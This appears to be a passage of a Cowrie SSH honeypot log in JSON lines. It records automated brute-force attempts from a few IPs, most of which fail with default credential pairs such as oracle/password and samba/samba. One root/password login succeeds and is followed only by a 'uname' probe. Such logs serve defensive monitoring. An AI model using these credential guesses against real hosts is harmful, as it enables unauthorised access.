{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:21.982389Z","src_ip":"212.227.125.160","session":"ce6169a1abfc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:22.034627Z","src_ip":"212.227.125.160","session":"ce6169a1abfc"}
{"eventid":"cowrie.login.failed","username":"angel","password":"angel","message":"login attempt [angel/angel] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:22.240602Z","src_ip":"212.227.125.160","session":"ce6169a1abfc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:23.293652Z","src_ip":"212.227.125.160","session":"ce6169a1abfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45474,"dst_ip":"1.2.3.4","dst_port":22,"session":"46bdeb97501f","protocol":"ssh","message":"New connection: 212.227.125.160:45474 (1.2.3.4:22) [session: 46bdeb97501f]","sensor":"my-vps","timestamp":"2025-08-26T11:46:27.367090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:27.369473Z","src_ip":"212.227.125.160","session":"46bdeb97501f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:27.443770Z","src_ip":"212.227.125.160","session":"46bdeb97501f"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:27.708843Z","src_ip":"212.227.125.160","session":"46bdeb97501f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:28.779107Z","src_ip":"212.227.125.160","session":"46bdeb97501f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37734,"dst_ip":"1.2.3.4","dst_port":22,"session":"f10ec25ffbe2","protocol":"ssh","message":"New connection: 83.168.105.65:37734 (1.2.3.4:22) [session: f10ec25ffbe2]","sensor":"my-vps","timestamp":"2025-08-26T11:46:31.747135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:31.747817Z","src_ip":"83.168.105.65","session":"f10ec25ffbe2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:31.784374Z","src_ip":"83.168.105.65","session":"f10ec25ffbe2"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:31.891890Z","src_ip":"83.168.105.65","session":"f10ec25ffbe2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:32.930113Z","src_ip":"83.168.105.65","session":"f10ec25ffbe2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46242,"dst_ip":"1.2.3.4","dst_port":22,"session":"86c83334f12f","protocol":"ssh","message":"New connection: 212.227.125.160:46242 (1.2.3.4:22) [session: 86c83334f12f]","sensor":"my-vps","timestamp":"2025-08-26T11:46:33.702303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:33.908592Z","src_ip":"212.227.125.160","session":"86c83334f12f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:33.909965Z","src_ip":"212.227.125.160","session":"86c83334f12f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:34.362273Z","src_ip":"212.227.125.160","session":"86c83334f12f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:35.415165Z","src_ip":"212.227.125.160","session":"86c83334f12f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47010,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea22f5f18544","protocol":"ssh","message":"New connection: 212.227.125.160:47010 (1.2.3.4:22) [session: ea22f5f18544]","sensor":"my-vps","timestamp":"2025-08-26T11:46:41.174192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:41.268035Z","src_ip":"212.227.125.160","session":"ea22f5f18544"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:41.268949Z","src_ip":"212.227.125.160","session":"ea22f5f18544"}
{"eventid":"cowrie.login.failed","username":"samba","password":"samba","message":"login attempt [samba/samba] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:41.741230Z","src_ip":"212.227.125.160","session":"ea22f5f18544"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:42.801691Z","src_ip":"212.227.125.160","session":"ea22f5f18544"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35110,"dst_ip":"1.2.3.4","dst_port":22,"session":"750312c1b33a","protocol":"ssh","message":"New connection: 83.168.105.65:35110 (1.2.3.4:22) [session: 750312c1b33a]","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.308934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.311419Z","src_ip":"83.168.105.65","session":"750312c1b33a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.350803Z","src_ip":"83.168.105.65","session":"750312c1b33a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.469989Z","src_ip":"83.168.105.65","session":"750312c1b33a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47784,"dst_ip":"1.2.3.4","dst_port":22,"session":"4496861cba5b","protocol":"ssh","message":"New connection: 212.227.125.160:47784 (1.2.3.4:22) [session: 4496861cba5b]","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.595357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.616574Z","src_ip":"212.227.125.160","session":"4496861cba5b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.652574Z","src_ip":"212.227.125.160","session":"4496861cba5b"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:46:47.860924Z","src_ip":"212.227.125.160","session":"4496861cba5b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:46:48.111556Z","src_ip":"212.227.125.160","session":"4496861cba5b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:46:48.112252Z","src_ip":"212.227.125.160","session":"4496861cba5b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:48.163372Z","src_ip":"212.227.125.160","session":"4496861cba5b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:48.164505Z","src_ip":"212.227.125.160","session":"4496861cba5b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:48.511868Z","src_ip":"83.168.105.65","session":"750312c1b33a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37518,"dst_ip":"1.2.3.4","dst_port":22,"session":"0eb44222e22c","protocol":"ssh","message":"New connection: 196.251.86.249:37518 (1.2.3.4:22) [session: 0eb44222e22c]","sensor":"my-vps","timestamp":"2025-08-26T11:46:49.766756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:50.256767Z","src_ip":"196.251.86.249","session":"0eb44222e22c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:46:50.257573Z","src_ip":"196.251.86.249","session":"0eb44222e22c"}
{"eventid":"cowrie.login.failed","username":"git","password":"test321","message":"login attempt [git/test321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:52.331444Z","src_ip":"196.251.86.249","session":"0eb44222e22c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48554,"dst_ip":"1.2.3.4","dst_port":22,"session":"02078efca182","protocol":"ssh","message":"New connection: 212.227.125.160:48554 (1.2.3.4:22) [session: 02078efca182]","sensor":"my-vps","timestamp":"2025-08-26T11:46:52.711423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:52.712113Z","src_ip":"212.227.125.160","session":"02078efca182"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:46:52.761675Z","src_ip":"212.227.125.160","session":"02078efca182"}
{"eventid":"cowrie.login.failed","username":"games","password":"games","message":"login attempt [games/games] failed","sensor":"my-vps","timestamp":"2025-08-26T11:46:52.916539Z","src_ip":"212.227.125.160","session":"02078efca182"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:53.931673Z","src_ip":"196.251.86.249","session":"0eb44222e22c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:46:53.968875Z","src_ip":"212.227.125.160","session":"02078efca182"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49324,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc3dcd7b6631","protocol":"ssh","message":"New connection: 212.227.125.160:49324 (1.2.3.4:22) [session: dc3dcd7b6631]","sensor":"my-vps","timestamp":"2025-08-26T11:46:58.117565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:46:58.118440Z","src_ip":"212.227.125.160","session":"dc3dcd7b6631"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"]